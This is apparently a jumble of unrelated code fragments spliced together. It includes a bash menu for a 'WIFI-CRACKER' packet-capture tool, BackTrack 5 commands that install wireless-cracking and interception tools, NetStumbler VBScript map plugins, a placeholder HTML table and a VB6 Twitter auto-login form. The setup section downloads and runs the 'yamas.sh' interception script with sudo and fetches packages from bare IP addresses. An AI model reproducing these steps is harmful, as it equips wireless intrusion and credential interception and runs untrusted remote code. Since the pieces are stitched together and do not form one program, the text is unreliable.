echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "SAVE FILENAME : ${FILE2} "
echo "========================================================================"
echo "Please choose an option"
echo " Have you changed your MAC yet? (STATUS: ${MACMODE})"
echo " 1. *MENU* Visit Mac spoofing menu"
echo " 2. Run tshark (on ${INTERFACE2})"
echo " 3. Run tshark and write to file"
echo " 4. Use tshark with any command"
echo " 5. Run wireshark (THE GREAT GUI VERSION OF TSHARK)"
echo " 6. Change you primary and monitoring interfaces' name"
echo " 7. Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo " 8. Turn ON monitor mode (STATUS: ${MONMODE})"
echo " 9. Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "10. *MENU* Exit to main menu"
echo "11. Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 11 ] " choice
case $choice in
1) macspoof_info ;;
2) pre_crack && tshark -i ${INTERFACE2} && pause ;;
3) pre_crack && tshark -i ${INTERFACE2} -w ${FILE2} && pause ;;
4) tshark_any ;;
5) wireshark & disown && pause ;;
6) ask_ifaces ;;
7) change_mon ;;
8) enable_mon ;;
9) off_mon ;;
10) main_menu ;;
11) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
tshark_any() {
pre_crack
show_logo
echo "############################################################################"
echo "#####################USE PERSONNAL COMMANDS FOR TSHARK######################"
echo "################################using tshark################################"
echo "############################################################################"
local COMMAND
read -p "What command would you like to use in tshark?? " COMMAND
echo "MESSAGE: OPENING TSHARK IN A NEW WINDOW"
${TERMINAL} -e "tshark ${COMMAND}" & pause
}
#+++++++++++++++++++++++++++++++++++++ MAIN FUNCTION +++++++++++++++++++++++++++++++++++++#
start_up
Dim Usuario As String
Dim Password As String
Usuario = "usuario"
WinsockClient.SendData Usuario & Chr(13) 'Enter
sudo apt-get update
sudo apt-get upgrade
sudo gedit /etc/apt/sources.list
################################################################################################+
####### REPOSITORIOS OFICIALES DE BACKTRACK 5 R3
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
sudo wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -
sudo add-apt-repository ppa:tualatrix/ppa
sudo apt-get update
apt-get install aircrack-ng tcpdump wireshark john rar kismet hashcat hashcat-utils oclhashcat oclhashcat+ oclhashcat-lite oclhashcat oclhashcat+ oclhashcat-lite cowpatty crunch netcat zenmap wavemon ettercap scapy synaptic subversion libpcap-dev gdebi bluez iw openjdk-6-jre openjdk-7-jre wifi-radar wpagui dhcp3-server openssh-server sqlite3 libsqlite3-dev libpcap-dev libpcre3-dev python-dev libxml2-dev python-pip build-essential python-pip python-dev libxml2-dev git gtk-sharp2 libncurses5-dev gettext mono-dmcs patch libnss3-1d ttf-dejavu ttf-dejavu-extra ttf-xfree86-nonfree xfs flashplugin-installer libnspr4-0d libxss1 skype skype-bin gambas2-gb-desktop gambas2-gb-form gambas2-gb-gtk gambas2-gb-gui gambas2-gb-qt gambas2-gb-settings gambas2-runtime libqt3-mt pyrit mdk3 reaver wifite nessus dnsmasq comerr-dev krb5-multidev libcurl4-gnutls-dev libgcrypt11-dev libgnutls-dev libgnutlsxx26 libgpg-error-dev libgssrpc4 libidn11-dev libkadm5clnt-mit8 libkadm5srv-mit8 libkdb5-5 libkrb5-dev libldap2-dev libreadline5 libruby1.8 libtasn1-3-dev ruby ruby1.8 krb5-doc libcurl3-dbg libgcrypt11-doc gnutls-doc gnutls-bin guile-gnutls krb5-user ri ruby-dev ruby1.8-examples ri1.8 wpscan ruby1.8-dev rubygems autotools-dev libdrm-dev libkms1 libltdl-dev libodbcinstq1c2 libpthread-stubs0 libpthread-stubs0-dev libqtwebkit-dev libqtwebkit4 libtool libx11-dev libxau-dev libxcb1-dev libxdmcp-dev libxext-dev odbcinst odbcinst1debian2 unixodbc unixodbc-dev x11proto-core-dev x11proto-input-dev x11proto-kb-dev x11proto-xext-dev xorg-sgml-doctools xtrans-dev cabextract fonts-horai-umefont gnome-exe-thumbnailer icoutils imagemagick libcdt4 libgraph4 libgvc5 libilmbase6 liblqr-1-0 libmagickcore3 libmagickcore3-extra libmagickwand3 libmpg123-0 libnetpbm10 libopenal1 libopenexr6 libpathplan4 netpbm ttf-droid ttf-mscorefonts-installer unrar winbind wine wine1.3 wine1.3-gecko winetricks gir1.2-unique-3.0 python-compizconfig python-lxml ubuntu-tweak gambas2 gstreamer0.10-fluendo-mp3 gstreamer0.10-plugins-ugly curl libcurl3 driftnet libgif-dev libjpeg62-dev sslstrip tcpxtract xutils-dev libgtk2-ex-entry-pango-perl libgtk2-ex-podviewer-perl libgtk2-ex-printdialog-perl libgtk2-ex-simple-list-perl libgtk2-ex-volumebutton-perl libgtk2-gladexml-perl libgtk2-gladexml-simple-perl libio-stringy-perl libnet-cups-perl libavcodec53 libavformat53 libavutil51 libpostproc52 libschroedinger-1.0-0 libswscale2 libva1 libvpx0
wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.0/compat-wireless-3.0.9-1.tar.bz2
tar -jxf compat-wireless-3.0.9-1.tar.bz2
cd compat-wireless-3.0.9-1
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch -p1 < channel-negative-one-maxim.patch
make
sudo make install
sudo make wlunload
sudo modprobe driver-name
wget http://ufpr.dl.sourceforge.net/project/wpscrackgui/AirUbuntu/wpscrackgui_1.1.8-1_airubuntu.deb
dpkg -i wpscrackgui_1.1.8-1_airubuntu.deb
wget http://ftp.debian.org/debian/pool/main/o/osm-gps-map/libosmgpsmap2_0.7.2-1_i386.deb
wget http://ftp.debian.org/debian/pool/main/o/osm-gps-map/python-osmgpsmap_0.7.2-1_i386.deb
dpkg -i libosmgpsmap2_0.7.2-1_i386.deb
dpkg -i python-osmgpsmap_0.7.2-1_i386.deb
git clone git://gitorious.org/kismon/mainline.git kismon
cd kismon
make
make install
wget http://comax.fr/yamas/bt5/yamas.sh
sudo bash yamas.sh
cd /usr/local/bin/
wget http://aircrackgui-m4.googlecode.com/files/AircrackGUI-M4-Ultimate-1.0.0-Beta2-32bits.tgz
unrar x AircrackGUI-M4-Ultimate-1.0.0-Beta2-32bits.tgz
cd AircrackGUI-M4-Ultimate-1.0.0-Beta2-32bits
chmod +x aircrack-GUI-Start.sh
cd /usr/local/bin/
wget http://wifite.googlecode.com/files/wifite-2.0r85.tar.gz
tar -xf wifite-2.0r85.tar.gz
chmod +x wifite.py
rm -r wifite-2.0r85.tar.gz
cd /usr/local/bin/
git clone git://wepcrackgui.git.sourceforge.net/gitroot/wepcrackgui/wepcrackgui
cd wepcrackgui
./configure
./configure && make
cd GWepCrackGui/bin/Debug/
chmod +x wepcrack
gksudo ./wepcrack
wget http://205.196.123.185/b66rsoxfn8sg/61wnxddjld89xu7/minidwep-gtk-30513-bt5-32bit.deb
dpkg -i minidwep-gtk-30513-bt5-32bit.deb
cd /usr/local/bin/
wget http://199.91.152.80/ctyvdhtp49rg/6ascsd04z6p2ej9/wpspy.py
wget http://205.196.121.233/g6g464sfrrdg/nsdr7akvpmzk6lm/wpscan.py
chmod +x wpspy.py
chmod +x wpscan.py
sub arch (lat, lon, alt)
Dim Lati
Dim Longi
Dim Alti
Set objshel = createobject("Wscript.shell")
Lati = lat
Longi = lon
Alti = alt
objshell.run "https://maps.google.com.ar/maps?q=" & Lati & Longi & Alti
end sub
AddItemContextMenu "arch", "Ver en Google MAPS"
sub arch (Lat, Lon, Alt)
Set objshell = createobject("Wscript.shell")
objshell.run "https://maps.google.com.ar/maps?q=" & Lat & Lon & Alt
end sub
AddItemContextMenu "arch", "Ver en Google MAPS"
sub GMAPS (Lat, Lon)
Set objshel = createobject("Wscript.shell")
rmensaje = objshel.popup("Visualizando en Google MAPS",3,"NetStumbler v0.4.0",64)
Set objshell = createobject("Wscript.shell")
objshell.run "https://maps.google.com.ar/maps?q=" & Lat & Lon
end sub
AddItemContextMenu "GMAPS", "Ver en Google MAPS"
<table id="tt" class="easyui-datagrid" style="width:400px;height:auto;">
<thead>
<tr>
<th field="name1" width="50">Col 1</th>
<th field="name2" width="50">Col 2</th>
<th field="name3" width="50">Col 3</th>
<th field="name4" width="50">Col 4</th>
<th field="name5" width="50">Col 5</th>
<th field="name6" width="50">Col 6</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data 1</td>
<td>Data 2</td>
<td>Data 3</td>
<td>Data 4</td>
<td>Data 5</td>
<td>Data 6</td>
</tr>
<tr>
<td>Data 1</td>
<td>Data 2</td>
<td>Data 3</td>
<td>Data 4</td>
<td>Data 5</td>
<td>Data 6</td>
</tr>
<tr>
<td>Data 1</td>
<td>Data 2</td>
<td>Data 3</td>
<td>Data 4</td>
<td>Data 5</td>
<td>Data 6</td>
</tr>
<tr>
<td>Data 1</td>
<td>Data 2</td>
<td>Data 3</td>
<td>Data 4</td>
<td>Data 5</td>
<td>Data 6</td>
</tr>
</tbody>
</table>
Private Sub Form_Load()
WebBrowser1.Navigate "https://mobile.twitter.com/compose/tweet"
End Sub
Private Sub WebBrowser1_DocumentComplete(ByVal pDisp As Object, URL As Variant)
If (pDisp Is WebBrowser1.Object) Then
'si se cargo el sitio habilitamos los botones y login.
Debug.Print "Se Cargo la pagina completamente..."
'verificamos en que sitio estamos: si login o tweet?
Text4.Text = WebBrowser1.Document.body.outerText
If Label3.Caption = Text5.Text Then
'Estamos en Inicio de Sesion.
Command1.Enabled = True
Text2.Enabled = True
Text3.Enabled = True
Else
'Estamos en Tweet.
Text1.Enabled = True
Command2.Enabled = True
'Des-habilitamos login.
Command1.Enabled = False
Text2.Enabled = False
Text3.Enabled = False
End If
End If
'¡Inicia sesión en Twitter! Regístrate
End Sub
Private Sub Text4_Change()
Dim Palabras() As String
Palabras = Split(Text4.Text, "!")
Text5.Text = Palabras(0)
End Sub
Private Sub Text2_Change()
'Completamos el campo del usuario con el TextBox 2.
Do While WebBrowser1.Busy
Loop
WebBrowser1.Document.getelementbyid("username").Value = Text2.Text
End Sub
Private Sub Text3_Change()
'Completamos el campo del password con el TextBox 3.
Do While WebBrowser1.Busy
Loop
WebBrowser1.Document.getelementbyid("password").Value = Text3.Text
End Sub
Private Sub Command1_Click()
'Enviamos el formulario con el usuario y contraseña.
WebBrowser1.Document.getelementbyid("commit").Click
End Sub
Private Sub Text1_Change()
'Completamos el campo del usuario con el TextBox 1.
Do While WebBrowser1.Busy
Loop
WebBrowser1.Document.All("tweet[text]").Value = Text1.Text
End Sub
Private Sub Command2_Click()
'Enviamos el tweet.
WebBrowser1.Document.getelementbyid("commit").Click
Timer1.Enabled = True
End Sub
Private Sub Timer1_Timer()
'visitamos el sitio tweet:
WebBrowser1.Navigate "https://mobile.twitter.com/compose/tweet"
Timer1.Enabled = False
End Sub